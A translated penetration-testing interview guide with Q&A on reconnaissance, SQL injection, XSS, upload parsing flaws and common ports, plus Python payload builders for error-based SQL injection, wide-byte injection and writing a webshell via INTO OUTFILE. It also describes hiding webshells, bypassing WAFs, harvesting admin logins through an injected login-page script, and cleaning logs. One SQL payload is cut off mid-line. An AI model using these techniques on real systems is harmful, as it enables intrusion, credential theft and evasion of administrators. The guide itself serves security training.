Summary of penetration testing interview questions (with analysis of answers + supporting materials)

Note: all the material has been compiled into PDFs, and the questions and answers will be updated continuously, since no single list can cover every interview question.

1. Methodology

1. Information gathering

a. Server information (real IP, OS type and version, open ports, WAF, etc.)

b. Website fingerprinting (CMS, CDN, TLS certificate, etc.) and DNS records

c. whois information: registrant name, ICP filing, e-mail, phone number reverse lookup (check whether the mailbox appears in leaked-credential ("social engineering") databases, prepare social-engineering material, etc.)

d. Subdomains, sites hosted on the same server (side sites), the surrounding /24 (C segment), etc.

e. Targeted Google hacking: PDF files, middleware versions, weak-password scanning, etc.

f. Scan the directory structure, brute-force the admin backend, read the banner, look for test files, backups and other leaked sensitive files, etc.

g. Transport protocol, known vulnerabilities and public exploits, source code on GitHub, etc.

2. Vulnerability discovery

a. Browse the site to gauge its size, functions and characteristics

b. Scan ports, weak passwords, directories, etc., and run vulnerability checks against each service found, such as rsync, Heartbleed, and MySQL, FTP and SSH weak passwords

c. XSS, SQL injection, file upload, command injection, CSRF, cookie security, sensitive-information disclosure, cleartext transmission, brute forcing, arbitrary file upload, broken access control (horizontal and vertical privilege), unauthenticated access, directory traversal, file inclusion, replay (e.g. SMS bombing), server-side vulnerabilities, and finally a pass with vulnerability scanners

3. Exploitation and privilege escalation

a. MySQL, Serv-U and Oracle privilege escalation

b. Windows overflow (kernel/service exploit) privilege escalation

c. Linux Dirty COW and other kernel-vulnerability privilege escalation

4. Clean up test data and write the report

Clean up and summarize logs and test data, write the penetration test report, and attach a remediation plan

5. Retest

Verify the fixes, look for new vulnerabilities, write the report, archive

2. Questions

1. When you are given a site to test, what should you do first?

  • Information gathering

a. Get the domain's whois record: registrant e-mail, name, phone number, etc. Run them through leaked-credential ("social engineering") databases to see whether a leaked password exists, then try that password on the admin backend. Use the e-mail address as a search-engine keyword; follow the associated results to other mailboxes and commonly used social accounts, which may reveal the administrator's password habits. Build a custom dictionary from everything collected.

b. Enumerate sites hosted on the same server and subdomains: the main site is usually the hardest, so first check whether a side site runs a common CMS or has other known holes.

c. Identify the server OS version and web middleware and check for known vulnerabilities, such as the IIS, Apache and Nginx parsing vulnerabilities

d. Resolve the IP, port-scan it, and test each exposed service, such as rsync, Heartbleed, and MySQL, FTP and SSH weak passwords

e. Scan the directory structure for directory listing or leaked sensitive files, such as a PHP probe page

f. Google hacking to further uncover site information, the admin backend and sensitive files

  • Vulnerability scanning

Start testing for vulnerabilities: XSS, CSRF, SQL injection, code execution, command execution, unauthenticated access, directory traversal, arbitrary file read and download, file inclusion, remote command execution, weak passwords, file upload, editor vulnerabilities, brute forcing, and so on

  • Exploitation

Use the findings above to get a webshell or other access

  • Privilege escalation

Escalate on the server: MySQL UDF escalation on Windows, Serv-U escalation, exploits for older Windows versions such as the IIS 6 exploit and pr.exe / Churrasco ("Brazilian barbecue") token kidnapping, Linux Dirty COW, other Linux kernel-version exploits, MySQL system escalation on Linux, and Oracle low-privilege escalation

  • Log cleanup

  • Summary report and remediation plan

2. What is the value of identifying the site's CMS for a penetration test?

You can look up vulnerabilities already disclosed for that program.

If it is open source, you can also download the source code and audit it.

3. For a mature, relatively secure CMS, what is the point of scanning directories during a test?

Sensitive files and second-level directories.

Webmaster mistakes, for example: compressed website backups, description.txt, and a second-level directory may host an entirely different site.

4. Common web server containers.

IIS, Apache, nginx, Lighttpd, Tomcat

5. With a MySQL injection point, what is needed for a tool to write a one-line webshell directly to the target site?

A database account with the FILE privilege (typically root) and the absolute path of the web root; secure_file_priv must also permit writing to that directory.

6. Which server versions are known to have parsing vulnerabilities? Give specific examples.

a. IIS 6.0: /xx.asp/xx.jpg is executed as ASP when "xx.asp" is the folder name; a file named xx.asp;.jpg is likewise executed as ASP.

b. IIS 7.0/7.5 with FastCGI enabled by default (PHP cgi.fix_pathinfo=1): append /1.php to an image URL and the image is parsed as PHP.

c. Nginx version <= 0.8.37: same technique as IIS 7.0/7.5, and it also works with FastCGI disabled; the null-byte variant is xxx.jpg%00.php.

d. Apache: a file named test.php.x1.x2.x3 is handled by the PHP module, because Apache evaluates extensions from right to left until it finds one it recognizes.

e. lighttpd: xx.jpg/xx.php. This list is incomplete; additions in the comments are welcome.
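The parsing rules above are the reason upload filters must look at the whole name and the whole request path, not just the last extension. The following is an added example, not code from the original page: a small checker that applies those rules to upload file names and to request paths (the kind of thing to run over an access log when hunting for the IIS 7 / nginx path-info trick). The extension lists and the assumption that PHP is attached with AddHandler (so any .php segment wins on Apache) are assumptions of this example; tune them to the server actually being tested.

```python
import urllib.parse

# Extensions a typical PHP/ASP/JSP host executes. Assumption for this example;
# tune it to the handlers actually configured on the target.
SCRIPT_EXTS = {"php", "php3", "php5", "phtml", "asp", "aspx", "asa", "cer", "jsp", "jspx"}
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}

def apache_handled_as(filename):
    """Apache mod_mime looks at every dotted extension and ignores the ones it
    does not know, so with 'AddHandler ... .php' the name test.php.x1.x2.x3 is
    still handed to PHP. Returns the script extension that wins, or None."""
    segments = filename.lower().split(".")[1:]
    for ext in reversed(segments):          # right to left, as Apache does
        if ext in SCRIPT_EXTS:
            return ext
    return None

def dangerous_upload_name(filename):
    """Reject names that one of the parsers above would execute.
    Returns the reason, or None if the name looks harmless."""
    name = urllib.parse.unquote(filename).lower()
    if "\x00" in name:                      # xxx.jpg%00.php (old nginx / PHP)
        return "null byte"
    if ";" in name:                         # IIS 6: shell.asp;.jpg runs as ASP
        if apache_handled_as(name.split(";", 1)[0]):
            return "IIS 6 semicolon"
    if apache_handled_as(name):             # shell.php.jpg (Apache multi-extension)
        return "script extension in name"
    return None

def pathinfo_probe(path):
    """IIS 7.x FastCGI / nginx with cgi.fix_pathinfo: /img.jpg/1.php executes
    img.jpg as PHP. Flags request paths where a non-final segment looks like an
    image and the final segment is a script."""
    segments = [s for s in path.split("?", 1)[0].split("/") if s]
    if len(segments) < 2:
        return False
    if segments[-1].rsplit(".", 1)[-1].lower() not in SCRIPT_EXTS:
        return False
    return any(seg.rsplit(".", 1)[-1].lower() in IMAGE_EXTS for seg in segments[:-1])

def iis6_directory_trick(path):
    """IIS 6: every file under a directory named like xx.asp is run as ASP."""
    dirs = [s for s in path.split("/") if s][:-1]
    return any(d.rsplit(".", 1)[-1].lower() in {"asp", "asa", "cer"} for d in dirs)
```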

7. How do you quickly tell by hand whether the target is a Windows or a Linux server?

Linux file systems are case-sensitive and Windows is not: change the case of a path component and see whether the page still loads.

8. Why does a site backed by MySQL show only port 80 open?

The port was changed and the scan did not find it.

The web server and the database run on separate hosts.

Port 3306 is not exposed to the outside (bound to localhost or firewalled).

9. Reasons port 3389 cannot be connected to

Port 3389 is not open.
The port has been changed.
Protection software is intercepting the connection.
The host is on the internal network (port forwarding is required).

10. How do you get around escaped characters during injection?

Wide-byte injection
Hex encoding to avoid quotes

11. You see a rich-text editor on the backend news editing page. What do you do first?

Identify the editor's name and version, then search for disclosed vulnerabilities.

12. You have a webshell and find a .htaccess file in the web root. What can you do with it?

Many things; hiding a webshell is one example. Insert

<FilesMatch "xxx.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

and the matching .jpg file is parsed as PHP.

The other uses are too many to detail here; it is worth searching for them yourself.

13. Can an injection vulnerability only be used to read account passwords?

No. With wide enough privileges you can dump the entire database.

14. Will SafeDog trace variables and detect a one-line webshell?

It matches signatures, so it is easy to bypass: with a little imagination you can walk right past it. Its signature set is not static, though.

15. A scan finds an Access database file with a .asp suffix, and opening it in the browser shows garbage. How do you use it locally?

Download it with a download manager such as Thunder and rename the suffix to .mdb.

16. When choosing a readable and writable directory for privilege escalation, why avoid directories with spaces in the path?

Because most exploits take space-separated command-line arguments, and a path containing a space is split into several arguments unless quoted.

17. A server hosts sites A and B. After adding a test user in A's backend, the same user appears in B's backend. Why?

They share the same database.

18. When injecting, can you start straight from order by without using and / or / xor?

The and/or/xor with 1=1 and 1=2 step only serves to confirm that the parameter is an injection point. If that is already established, the step can be skipped.

19. An anti-injection system displays the following when you inject:

The system has detected illegal injection behaviour.
Your IP xx.xx.xx.xx has been recorded
Time: 2016:01-23
Submitted page: test.asp?id=15
Submitted content: and 1=1

20. How can this anti-injection system be used to get a shell?

Submit a one-line webshell directly in the URL: the system records the "illegal" submission into its database file. Then find the file it writes to (the site's configuration or database file), and if that file has a script suffix, connect to it with China Chopper ("kitchen knife").

21. After uploading a big webshell, the page shows garbled characters. What are the solutions?

Change the character encoding in the browser.

22. What is the point of inspecting the element of an upload point?

Some sites implement the upload type restriction only on the front end; adding the desired type to the allowed list in the page is enough to break the restriction.

23. The target site has registration disabled, and entering a user name in the password recovery form prompts "This user does not exist". How can this be used?

First enumerate user names through that prompt, then brute-force passwords for the names found.
Some sites give the same kind of prompt at login.
Every place that talks to the database may also be injectable.

24. The target site's download link for a txt file is

http://www.test.com/down/down.php?file=/upwdown/1.txt, what do you think?

This is the classic arbitrary file download. Put index.php after file= to download the home page source, then follow the configuration files it includes to find the database address and password.

25. Someone gives you a target site and tells you there is a /abc/ directory under the root, with editor and admin directories inside it. What do you do?

Scan for sensitive files and directories directly under the second-level directory /abc/.

26. Having a shell, how do you use XSS to keep long-term control of the target site?

Add a piece of JavaScript to the backend login page that records the submitted account and password and checks whether the login succeeded; on success, write the credentials to a file at an obscure path or send them straight to your own site. (This is for valuable targets where deep, lasting control is needed.)

Insert XSS scripts in files that are only reachable after login.

27. On the backend's change-password page the current password is shown as asterisks. How do you read it?

Inspect the element and change the password field's type attribute from password to text, so the value is displayed in plain text.

28. The target site has no protection, uploaded images can be accessed normally, but accessing an uploaded script returns 403. Why?

There are many possible reasons. Most likely the web server configuration hard-codes the upload directory as non-executable, so scripts there are not run. Try changing the suffix to bypass it.

29. You can learn which protection software a site uses by inspecting the page. How?

When a sensitive operation is blocked and the product cannot be identified from the block page, F12 shows the product name in the HTML body (for example "Patronus").

30. Why create a .zhongzi folder on a Windows 2003 server?

It is a hidden folder, to keep the administrator from finding the tools you uploaded.

31. Given these two SQL injection test options, choose one and explain why you reject the other:

A. demo.jsp?id=2+1
B. demo.jsp?id=2-1

Choose B: in URL encoding + decodes to a space, which would garble the test.

32. The following link has a SQL injection vulnerability. How do you handle this transformed injection?

demo.do?DATA=AjAxNg==
DATA is probably base64 encoded before being sent to the server, so our test parameters must also be base64 encoded to be processed correctly.

33. You find an injection point at demo.jsp?uid=110. What are your options for obtaining a webshell, and which is best?

If you have write permission, build a UNION query with INTO OUTFILE to redirect the query output to a file on the server, writing the webshell that way. sqlmap --os-shell works on the same principle and gets a shell directly, which is more efficient. Otherwise, use a UNION query to read the administrator's account and password, scan for the backend, log in, and upload the shell through the backend by tampering with the upload request.

34. What are the differences between CSRF, XSS and XXE, and how are they fixed?

XSS (cross-site scripting): code placed in user-submitted data is executed in other users' browsers, enabling theft of user information and similar attacks. Fix: entity-escape output, mark cookies HttpOnly so JavaScript cannot read them, validate input, and use the same character encoding in the browser and the web application.

CSRF (cross-site request forgery): the application does not confirm that a sensitive operation was initiated by the user voluntarily; XSS is one of many ways to deliver a CSRF. Fix: identify the pages that need CSRF protection and embed a token in them, require re-entering the password for sensitive actions, and verify the Referer.

XXE (XML external entity injection): XML entities can be declared to fetch local or remote content, so, much like a remote file inclusion, it leads to sensitive file reads and related problems. Fix: configure the XML parsing library to refuse external entities.

35. What are the differences between CSRF, SSRF and replay attacks?

CSRF is cross-site request forgery and is initiated from the client; SSRF is server-side request forgery, where the request is initiated by the server; a replay attack resends captured packets to pass authentication or achieve similar goals.

36. Name at least three business-logic vulnerabilities and how to fix them.

Password-reset vulnerabilities:

1) the password can be brute-forced,

2) a universal reset credential exists,

3) the verification step can be skipped,

4) the reset credential can be captured by intercepting the request,

all of which let an attacker obtain the password through the vendor's own password-reset function. The most common authentication vulnerabilities are

1) session fixation

2) cookie phishing

since whoever holds the session or cookie can impersonate the user. Captcha vulnerabilities:

1) the captcha can be brute-forced

2) the captcha can be bypassed through JavaScript or by modifying the request

37. Circle the items in the following request that may be problematic, and note the possible issues.

GET /ecskins/demo.jsp?uid=2016031900&keyword="hello world" HTTP/1.1
Host: ****.com:82
User-Agent: Mozilla/5.0 Firefox/40
Accept: text/css,*/*;q=0.1
Accept-Language: zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3
Referer: http://****.com/eciop/orderForCC/cgtListForCC.htm?zone=11370601&v=145902
Cookie: myguid1234567890=1349db5fe50c372c3d995709f54c273d; uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ; st_uid=N90PLYHLZGJXI-NX01VPUF46W; status=True
Connection: keep-alive


38. You are given a website. How do you carry out a penetration test? (Assume written authorization has been obtained.)

39. How do you use sqlmap on an injection point?

1) For a GET parameter, simply sqlmap -u "injection point URL".
2) For a POST parameter, sqlmap -u "injection point URL" --data="post parameters".
3) For an injection in a cookie, X-Forwarded-For or another header, capture the request with Burp Suite, mark the injection point with *, save the request to a file, and run sqlmap -r "file path".

40. nmap: the different scan types

41. What types of SQL injection are there?

1) Error-based injection
2) Boolean-based blind injection
3) Time-based blind injection
4) Wide-byte injection

42. Which functions can be used for error-based injection? (10)

1) and extractvalue(1, concat(0x7e,(select @@version),0x7e))
2) floor() error (rounding down; the classic rand()/group by duplicate-key error)
3) and updatexml(1, concat(0x7e,(select @@version),0x7e),1)
4) geometrycollection(): select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5) multipoint(): select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6) polygon(): select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7) multipolygon(): select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8) linestring(): select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9) multilinestring(): select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10) exp(): select * from test where id=1 and exp(~(select * from
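The extractvalue()/updatexml() payloads above only show part of the job: MySQL puts at most 32 characters of the offending string into the XPATH error, so anything longer has to be read in windows with substr(), and the fragments have to be parsed out of the error page. The following is an added example, not code from the original page: a payload builder and error-page parser that reads a value of any length, run against a constructed stand-in for a verbose PHP page (FAKE_DB, fake_server and the sample version string are inventions of this example, not a real target).

```python
import re

# MySQL echoes at most 32 characters of the offending string in an
# "XPATH syntax error" message, so longer values are read in windows.
ERROR_LIMIT = 32
WINDOW = ERROR_LIMIT - 1            # one character is spent on the '~' marker

def error_payload(expr: str, offset: int) -> str:
    """extractvalue() payload that leaks WINDOW characters of `expr`,
    starting at 1-based `offset`, inside the error message."""
    return "and extractvalue(1, concat(0x7e, substr((%s), %d, %d)))" % (expr, offset, WINDOW)

ERROR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")

def parse_error(body: str):
    """Pull the leaked fragment out of a MySQL error page; None if absent."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None

def leak(expr: str, send) -> str:
    """Read the whole value of `expr`. `send(payload)` issues the injected
    request and returns the response body."""
    out, offset = "", 1
    while True:
        frag = parse_error(send(error_payload(expr, offset)))
        if frag is None:
            raise RuntimeError("no XPATH error in response (errors suppressed?)")
        out += frag
        if len(frag) < WINDOW:          # a short window means we hit the end
            return out
        offset += WINDOW

# --- constructed stand-in for a vulnerable page; not a real target ----------
TABLES_EXPR = ("select group_concat(table_name) from information_schema.tables "
               "where table_schema=database()")
FAKE_DB = {
    "@@version": "5.7.26-0ubuntu0.18.04.1-log",
    TABLES_EXPR: "admin_users,articles,comments,config,sessions",
}
PAYLOAD_RE = re.compile(r"substr\(\((.*)\), (\d+), (\d+)\)\)\)$")

def fake_server(payload: str) -> str:
    """Evaluates only the substr() window, the way MySQL would, and returns
    the error page a verbose PHP site prints."""
    m = PAYLOAD_RE.search(payload)
    value = FAKE_DB[m.group(1)]
    start, length = int(m.group(2)) - 1, int(m.group(3))
    return ("You have an error in your SQL syntax... "
            "XPATH syntax error: '~%s'" % value[start:start + length])
```

Against a real target, `send` would be a function that puts the payload into the injectable parameter and returns the HTTP body; the rest of the code is unchanged.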

43. How do you test for time-based injection?

if(ascii(substr("hello", 1, 1))=104, sleep(5), 1)

44. What do boolean-based blind injection and time-based injection have in common?

Both determine the result character by character.

45. How do you get a webshell on a website?

File upload, editing templates in the backend, writing files through SQL injection, command execution, code execution, and disclosed CMS vulnerabilities, e.g. the DedeCMS backend can create script files directly, and WordPress lets you upload a plugin zip archive containing a script.

46. Which statements write files through SQL injection?

select '<one-line webshell>' into outfile 'path'
select '<one-line webshell>' into dumpfile 'path'
select '' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';

47. How do you prevent CSRF?

1) Verify the Referer
2) Verify a token
details: CNode: Node.js Professional Chinese Community

48. What are the OWASP Top 10 vulnerabilities?

1) Injection (SQL injection, etc.)
2) Broken authentication and session management
3) Cross-site scripting (XSS)
4) Insecure direct object references
5) Security misconfiguration
6) Sensitive data exposure
7) Missing function-level access control
8) Cross-site request forgery (CSRF)
9) Using components with known vulnerabilities
10) Unvalidated redirects and forwards

49. SQL injection protection methods?

1) Use a safe API (parameterized queries)
2) Escape special characters in the input
3) Validate input against a whitelist
4) Restrict client-side input so that special characters related to SQL injection are not accepted
5) On the server side, filter, escape, replace or remove special characters before the data reaches the SQL query

50. Which functions enable code execution, file reading and command execution?

1) Code execution:

eval, preg_replace with the /e modifier, assert, call_user_func, call_user_func_array, create_function

2) File reading:

file_get_contents(), highlight_file(), fopen(), readfile(), fread(), fgetss(), fgets(), parse_ini_file(), show_source(), file(), etc.

3) Command execution:

system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()

51. Besides the onerror attribute of an img tag, is there another way to obtain the admin path?

Point src at a remote script on your own server and read the Referer from its request.

52. Besides the onerror attribute of an img tag, and with src required to end in .jpg, how do you get the admin path?

1) On the remote server, edit the Apache configuration so that .jpg files are parsed as PHP (AddType application/x-httpd-php .jpg), then serve the script as a .jpg.

53. Why does an ASPX webshell have more privileges than an ASP one?

ASPX uses .NET, which IIS does not enable by default, while ASP is just a scripting language. An ASP webshell generally runs with guest privileges, whereas an ASPX webshell generally runs with user-level privileges.

54. How do you bypass a WAF?

Case variation
Interfering characters (/*!*/ inline comments)
Encoding: base64, unicode, hex, URL, ASCII, multiple layers of encoding
Parameter manipulation

55. How do you write a webshell to the server?

Various upload vulnerabilities
MySQL with write (FILE) permission: write the shell with a SQL statement
The HTTP PUT method

56. Common ports in penetration testing

a. Web (web vulnerabilities / sensitive directories); common third-party component vulnerabilities: Struts, ThinkPHP, JBoss, Ganglia, Zabbix

80 web
80-89 web
8000-9090 web

b. Databases (scan for weak passwords)

1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL

c. Special services (unauthenticated access / command execution / known vulnerabilities)

443 SSL Heartbleed
873 rsync unauthenticated access
5984 CouchDB http://xxx:5984/_utils/
6379 Redis unauthenticated access
7001,7002 WebLogic default weak passwords, deserialization
9200,9300 Elasticsearch, see WooYun: ElasticSearch command execution on a Duowan server
11211 memcache unauthenticated access
27017,27018 MongoDB unauthenticated access
50000 SAP command execution
50070,50030 Hadoop default ports, unauthenticated access

d. Commonly used services (weak passwords / port brute forcing)

21 FTP
22 SSH
23 Telnet
2601,2604 zebra routing, default password zebra
3389 Remote Desktop

Full port list with details

21 FTP
22 SSH
23 Telnet
80 web
80-89 web
161 SNMP
389 LDAP
443 SSL Heartbleed and various web vulnerability tests
445 SMB
512,513,514 Rexec
873 rsync unauthenticated access
1025,111 NFS
1433 MSSQL
1521 Oracle (iSqlPlus ports: 5560, 7778)
2082/2083 cPanel hosting control panel login (common abroad)
2222 DirectAdmin (DA) hosting control panel login (common abroad)
2601,2604 zebra routing, default password zebra
3128 Squid proxy default port; with no password set you can very likely roam the intranet directly
3306 MySQL
3312/3311 Kangle hosting control panel login
3389 Remote Desktop
4440 Rundeck, see WooYun: roaming Sina's intranet through a Sina service
5432 PostgreSQL
5900 VNC
5984 CouchDB http://xxx:5984/_utils/
6082 Varnish, see WooYun: unauthenticated access to the Varnish HTTP accelerator CLI easily leads to direct site defacement or use as a proxy into the intranet
6379 Redis unauthenticated access
7001,7002 WebLogic default weak passwords, deserialization
7778 Kloxo hosting control panel login
8000-9090 common web ports; some ops teams put admin backends on these non-80 ports
8080 Tomcat / WDCP hosting control panel, default weak passwords
8080,8089,9090 JBoss
8083 VestaCP hosting control panel (common abroad)
8649 Ganglia
8888 AMH / LuManager hosting control panel default port
9200,9300 Elasticsearch, see WooYun: ElasticSearch command execution on a Duowan server
10000 Virtualmin/Webmin server virtual hosting control panel
11211 memcache unauthenticated access
27017,27018 MongoDB unauthenticated access
28017 MongoDB statistics page
50000 SAP command execution
50070,50030 Hadoop default ports, unauthenticated access

3. Questions asked at a security vendor

Which vulnerabilities do you know?

What protections exist against malicious file upload?

What do you use to scan ports and directories?

How do you determine whether a parameter is injectable?

What if the injection point is protected?

Have you written a sqlmap tamper script?

What are ports 3306, 1443 and 8080?

Computer networking from the physical layer up to the application layer, etc.

Do you have web service development experience?

How do you write a webshell to the server?

Have you used an XSS platform?

The workflow of a website penetration test

The two MySQL privilege escalation methods (UDF, ?)

Common encryption methods, etc.

How do you defend against DDoS?

Have you captured packets, and can you write Wireshark filter rules?

Which logs need to be cleaned?

4. SQL injection protection

1. Use a safe API (parameterized queries)
2. Escape special characters in the input
3. Validate input against a whitelist
4. Restrict client-side input so that special characters related to SQL injection are not accepted
5. On the server side, filter, escape, replace or remove special characters before the data reaches the SQL query
6. Standardize encodings and character sets

5. Why parameterized queries prevent SQL injection

Principle:

With a parameterized query the database server does not execute the parameter's content as part of the SQL command: it compiles the SQL command first and only then runs it with the parameter values.

Simply put: parameterization prevents injection because a statement is a statement and a parameter is a parameter; the value of a parameter is never part of the statement, and the database executes only the semantics of the statement.

6. SQL injection points in HTTP headers

User-Agent
Referer
Cookie
Client IP (X-Forwarded-For and similar headers)

7. What is blind injection? How is it done?

Blind injection is SQL injection where the server has turned off error output, so we can only detect and exploit the injection through changes in the content the server returns. There are two methods. One checks whether the page content returned is correct or not (boolean-based). The other uses the difference in processing time of the SQL statement (time-based); delay functions such as benchmark and sleep, or a joined query with a large Cartesian product, produce the delay.

8. Principle and root cause of wide-byte injection

1. How it arises

When the database uses a wide (multi-byte) character set and the web layer ignores this: at the web layer 0xBF27 is two separate characters, so with addslashes or magic_quotes_gpc enabled in PHP the 0x27 single quote is escaped and 0xBF27 becomes 0xBF5C27. When the data reaches the database, 0xBF5C is one valid character, so the \ escape is "eaten" by the preceding 0xBF, and the single quote is free again and can close the string.

2. Where the encoding happens

3. Root cause

character_set_client (the client character set) and character_set_connection (the connection character set) differ, or conversion functions such as iconv and mb_convert_encoding are used incorrectly.

4. Fix

Use one character set consistently across the database, the web application and the operating system, preferably UTF-8, so nothing is parsed differently along the way. Or escape properly, e.g. mysql_real_escape_string after mysql_set_charset.
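The byte-level mechanism is easy to reproduce. The following is an added example, not code from the original page: a byte-by-byte addslashes() as PHP's magic_quotes_gpc applies it, a check that decodes the escaped bytes the way a server with the given character_set_client would and reports whether a bare quote survives, and a scan for every lead byte that swallows a backslash in a given charset. The payload and the charset names are this example's own choices; the "unified UTF-8" fix from point 4 is what makes the second check fail.

```python
def addslashes(data: bytes) -> bytes:
    """PHP addslashes() / magic_quotes_gpc, byte by byte: a backslash is put
    before ' " \\ and NUL with no regard to the character set."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def db_sees_bare_quote(payload: bytes, charset: str) -> bool:
    """Decode the escaped bytes as a server with character_set_client =
    `charset` would, and report whether a single quote survives unescaped."""
    text = addslashes(payload).decode(charset, errors="replace")
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            return True
    return False

def lead_bytes_that_eat_backslash(charset: str):
    """Every lead byte L for which the two bytes L 0x5C form one character in
    `charset`; each of them turns \\' into <char>' after addslashes()."""
    eaters = []
    for lead in range(0x81, 0xFF):
        try:
            if len(bytes([lead, 0x5C]).decode(charset)) == 1:
                eaters.append(lead)
        except UnicodeDecodeError:
            pass
    return eaters

# Constructed payload: sent as %bf%27%20or%201=1%23 in the URL.
PAYLOAD = b"\xbf' or 1=1#"
```

With the connection in GBK the escaped bytes 0xBF 0x5C 0x27 decode as one CJK character followed by a bare quote; decoded as UTF-8, 0xBF is an invalid lone byte and the backslash stays in front of the quote, so the literal is not closed.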

5. How to exploit injection when only an UPDATE is available

First understand this SQL:

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

Injection is achieved if the statement is altered as follows:

a. Set the homepage value to http://xxx.net', userlevel='3

The SQL statement then becomes

UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='$id'

(userlevel is the user's privilege level)

b. Set the password value to mypass)' WHERE username='admin'#

The SQL statement then becomes

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

c. Set the id value to ' OR username='admin' and the SQL statement becomes

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

9. How to write a shell through SQL / what to do if single quotes are filtered

Writing a shell requires: root (FILE) privilege, GPC off so that quotes survive, a known web root path, and the outfile functions (secure_file_priv must also allow writing to that directory)

http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY '<?php phpinfo(); ?>'

http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile 'C:\\wamp64\\www\\phpinfo.php'

If single quotes are filtered: pass the string as a hex literal (0x...), as in the second example, or use wide-byte injection to free the quote.
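The hex form in the second URL above is how the quote filter is avoided (question 10 and question 46 rely on the same trick). The following is an added example, not code from the original page: a builder for the two INTO OUTFILE payloads shown above that hex-encodes the shell, escapes the Windows path the way the page's URL does, and can be round-tripped to verify the literal before it is sent. The shell text and paths are the ones on the page; the column count is an assumption found beforehand with ORDER BY. Note that the file name after INTO OUTFILE must still be a quoted string (MySQL does not take a hex literal there), which is why "GPC off" is listed among the preconditions.

```python
import binascii

def hex_literal(s: str) -> str:
    """MySQL 0x... literal: the same bytes as the quoted string but without
    quote characters, so it survives quote filtering and magic_quotes."""
    return "0x" + binascii.hexlify(s.encode()).decode()

def decode_hex_literal(lit: str) -> str:
    """Reverse of hex_literal; used to double-check a payload before sending."""
    if not lit.startswith("0x"):
        raise ValueError("not a hex literal")
    return binascii.unhexlify(lit[2:]).decode()

def mysql_path_literal(path: str) -> str:
    """Quote a file system path for INTO OUTFILE. Backslashes are doubled,
    as in the Windows example above. The file name must be a quoted string
    (a hex literal is not accepted), so the quotes must reach MySQL unescaped."""
    return "'" + path.replace("\\", "\\\\").replace("'", "\\'") + "'"

def union_outfile_payload(columns: int, shell: str, path: str, base_id: str = "-1") -> str:
    """UNION-based write. `columns` is the column count found with ORDER BY;
    the shell goes in column 2 and the rest are filled with numbers. Every
    column is written to the file, which does not matter for PHP: the
    interpreter only acts on the <?php ... ?> part."""
    if columns < 2:
        raise ValueError("need at least two columns for this layout")
    cols = ["1", hex_literal(shell)] + [str(i) for i in range(3, columns + 1)]
    return "%s union select %s into outfile %s" % (base_id, ",".join(cols), mysql_path_literal(path))

def lines_terminated_payload(shell: str, path: str, base_id: str = "1") -> str:
    """Variant of the first URL above that needs no column count: the shell is
    appended to every output line as the line terminator."""
    return "%s into outfile %s lines terminated by %s" % (base_id, mysql_path_literal(path), hex_literal(shell))
```

The union payload for four columns reproduces the page's second URL exactly, which is a useful check that the encoding is right; the select part contains no quote at all.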

1. Ways to replace spaces

%0a, %0b, %a0, etc.
/**/ and other comment sequences
<>

2. What differs when injecting a MySQL site on versions above and below 5.0?

Below 5.0 there is no information_schema database, so table and column names cannot be enumerated and must be brute-forced.

Below 5.0 is multi-user with single operation; 5.0 and above is multi-user with multiple operations.

10. XSS

1. Principle of XSS

Reflected

Code placed in user-submitted data is executed, enabling theft of user information and similar attacks. The victim must be tricked into clicking a malicious link for the attack to succeed.

Stored

Stored XSS keeps the user-supplied data on the server side, so the payload fires for everyone who views it; this kind of XSS is very persistent.

DOM-based

XSS produced by modifying the page's DOM nodes is called DOM-based XSS.

2. Difference between DOM-based and reflected XSS

Reflected XSS: the user is induced to click, and the payload we constructed is reflected back and triggers. When testing, each request carrying a payload should show that payload in the response. DOM-based XSS is created by JavaScript code manipulating the DOM, so the payload may never appear in the HTTP response at all. To me the fundamental difference is where the output point is.

3. Automated or manual testing for DOM-based XSS

Manual testing: look for sinks such as document.write, innerHTML and outerHTML assignment, window.location operations, writing javascript: URLs, and direct execution through eval, setTimeout and setInterval. Find the variables they receive, trace them back to their sources to see whether they are attacker-controlled and whether they pass through a sanitizing function. For automated testing see Brother Dao's blog: start from the inputs, follow how the variables propagate, and check whether they reach a dangerous sink without passing a safe function on the way. This needs a JavaScript parser, otherwise content introduced by JS execution is missed.

In practice, testing for customers is mostly driven by the individual function points plus experience and intuition; detection is not really subdivided and standardized by XSS type, so this answer is rather weak.

4. How to quickly find the XSS location

5. Recommendations for fixing XSS

Check at the input point: validate user input, filter sensitive characters or escape them, and enforce the format of typed data. Input checks are best done on the server side.

Encode at the output point: encode or escape the content when a variable is written into the HTML page. HTML-encode when it is output in HTML; JavaScript-encode when it is output inside a script. Put JavaScript-encoded variables in quotes and escape the dangerous characters, so the data cannot break out of the quotes and become code. A stricter approach is to hex-encode every non-alphanumeric character. Note also that browsers parse HTML before JavaScript, so the order of encodings must be considered carefully. Different output points need different XSS defences; a summary may follow in later articles.

In addition, HttpOnly limits cookie hijacking.
